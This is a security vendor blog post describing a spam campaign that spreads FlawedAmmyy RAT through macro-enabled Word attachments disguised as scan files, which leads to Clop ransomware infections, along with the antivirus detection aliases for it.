A Closer Look at the FlawedAmmyy’s New Attack Style

Clop ransomware made a full appearance early this year, mainly targeting Korean organizations and corporations. In addition to being targeted ransomware, Clop ransomware uses a hacking tool called FlawedAmmyy RAT (Remote Access Trojan). Despite the boom of Clop ransomware since the end of May, the spread of FlawedAmmyy RAT has only recently surged. In particular, it has been targeting local companies, as shown in the following example.

Distributed in early morning disguised as a work-related email
In August, FlawedAmmyy was distributed to local organizations and corporations via email spamming disguised as a work-related email. Simultaneously, similar spam emails were distributed globally to various users.  

Spam email targeting local companies disguised itself as ‘Scan file’ and attached a word file named ‘Scan_ (random number).doc’. When the user clicks on the attached file, the user is induced to activate the macro functions.

The macro code included in these Word files can be accessed by two different methods. One is by using Internet Explorer (IE) object to access a specific URL and downloading the file, as shown in Figure 1. 

Figure 1. Process tree of document after being executed using IE object

The other is by downloading the MSI file from the outside using type and form object information, as shown in Figure 2.

Figure 2. Method of downloading the MSI file

FlawedAmmyy RAT primarily installs Clop ransomware and other Remote Access Trojan or backdoors on infected systems. Some examples of Clop ransomware attack that happened this year have attempted to spread malware and steal system information through internal systems of corporations. Therefore, corporate security officers need to be cautious as FlawedAmmyy is constantly evolving as it is being distributed globally.
Meanwhile, AhnLab’s security solution detects malicious document files related to spam mails that distributes FlawedAmmyy and executable files downloaded in the following aliases. V3, AhnLab’s anti-malware product, also blocks these malicious files from connecting to the C & C server. However, V3’s Active Defense setting must be enabled.
<Aliases identified by AhnLab>

– VBA/AMMacro.S10
– VBA/AMMacro.S11
– Win-Trojan/Suspig9.Exp  ​ 

Categories:Malware Information

0 0 votes
Article Rating
Notify of

Inline Feedbacks
View all comments